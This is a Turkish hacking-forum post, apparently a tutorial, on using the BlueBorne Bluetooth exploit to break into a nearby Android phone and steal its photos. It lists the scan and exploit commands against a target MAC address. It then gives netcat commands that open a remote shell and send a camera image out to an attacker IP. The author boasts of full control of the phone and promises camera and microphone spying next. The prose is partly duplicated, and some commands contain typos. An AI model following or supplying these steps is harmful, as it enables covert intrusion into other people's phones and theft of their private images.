Anarchosa&ByR0L3S4
Selamun Aleyküm Yine Ben ByR0L3S4 Bu Gün Bluetoothda ki açık sayesinde karşı telefondan resimleri çalma yada erişim sağlamayı gösterceğim bundan sonraki makalelerde daha farklı bluetooth zafiyetleri gösteririm
(CANIM İSTERSE xD )
İLK OLARAK TERMİNALİ AÇALIM
ŞİMDİ BLUETOOTH KARTIMIZIN İSMİNİ ÖĞRENCEĞİZ .
Benimki hci0.
Sıra Geldi Etraftaki Bluetooth Cihazlarını Taratmaya
Karşımıza Bluetooth Açık Cihazlar Geldi . Burda Bluetooth Mac Adresleri Vardır Sızma İşlemini Deniceğiniz Cihazın Adresini Kopyalıalım
Şimdi .py uzantılı dosyamızı indirerek saldırıya başlıcağız.
6-Terminale
İndirdiğimiz klasörün içinden Android klasörüne geçiş yapıyoruz.
Burada doit.py isimli python diliyle yazılmış bir aracımız var.
--> Terminale
Burada sudo komutumuzla yönetici olarak aracı çalıştırıyoruz, python2 komutumuzla aracın dilini belirtiyoruz, hci0 komutumuzla bluetooth usb kartımızın ismini yazıyoruz, ve boşluk bırakıp hedef telefonun mac adresini yazıyoruz.
Ve cihaza sızmak için bekliyoruz.
--> Sızdıktan sonraki komutlar:
Burda Mausemiz Karşı Telefona Tanındı Mause İle Her Şeyi Yapabiliriz Karşı Telefonda
Örnek Diyelim Karşı Kişinin camerasından Fotoğrafını Çektik şimdi dosyalarına erişmemiz lazım
burda resimler vardır bu dosya yolu standrat değildir ama genellikle bu şekildedir neyse galeriye ulaştık şimdi orda çektiğimiz resimin ismini kopyalıyoruz .
yazıyoruz ve entere tıklıyoruz . Resim karşımıza Geldi 
Bu Açığı 2017 de kullanıyordum büyük ihtimalle hala var
Bu zafiiyetten yararlanarak telefona tam kontrol yapabilirsiniz . bu sadece 1 tanesiydi diğer makalede belki kamera izleme microfon dinleme vs şeyleri gösteririm
Selamun Aleyküm Yine Ben ByR0L3S4 Bu Gün Bluetoothda ki açık sayesinde karşı telefondan resimleri çalma yada erişim sağlamayı gösterceğim bundan sonraki makalelerde daha farklı bluetooth zafiyetleri gösteririm
İLK OLARAK TERMİNALİ AÇALIM
Kod:
sudo hciconfig
Kod:
iwconfig
Sıra Geldi Etraftaki Bluetooth Cihazlarını Taratmaya
Kod:
sudo hcitool scan
Şimdi .py uzantılı dosyamızı indirerek saldırıya başlıcağız.
6-Terminale
Kod:
git clone https://github.com/ArmisSecurity/blueborne
Burada doit.py isimli python diliyle yazılmış bir aracımız var.
--> Terminale
Kod:
sudo python2 doit.py hci0 B9:36:9A:82:13:05
Ve cihaza sızmak için bekliyoruz.
--> Sızdıktan sonraki komutlar:
Kod:
id
Kod:
getrop ro.product.model && getprop ro.build.fingerprint
Kod:
toybox nc 192.168.1.45 5556 | sh
Burda Mausemiz Karşı Telefona Tanındı Mause İle Her Şeyi Yapabiliriz Karşı Telefonda
Örnek Diyelim Karşı Kişinin camerasından Fotoğrafını Çektik şimdi dosyalarına erişmemiz lazım
Kod:
ls /strorage/self/primary/DCIM/Camera/
burda resimler vardır bu dosya yolu standrat değildir ama genellikle bu şekildedir neyse galeriye ulaştık şimdi orda çektiğimiz resimin ismini kopyalıyoruz .
Kod:
ls /strorage/self/primary/DCIM/Camera/ IMG_20170814_163352.jpg|toybox nc 192.168.1.139 5556
Bu Açığı 2017 de kullanıyordum büyük ihtimalle hala var
Moderatörün son düzenlenenleri: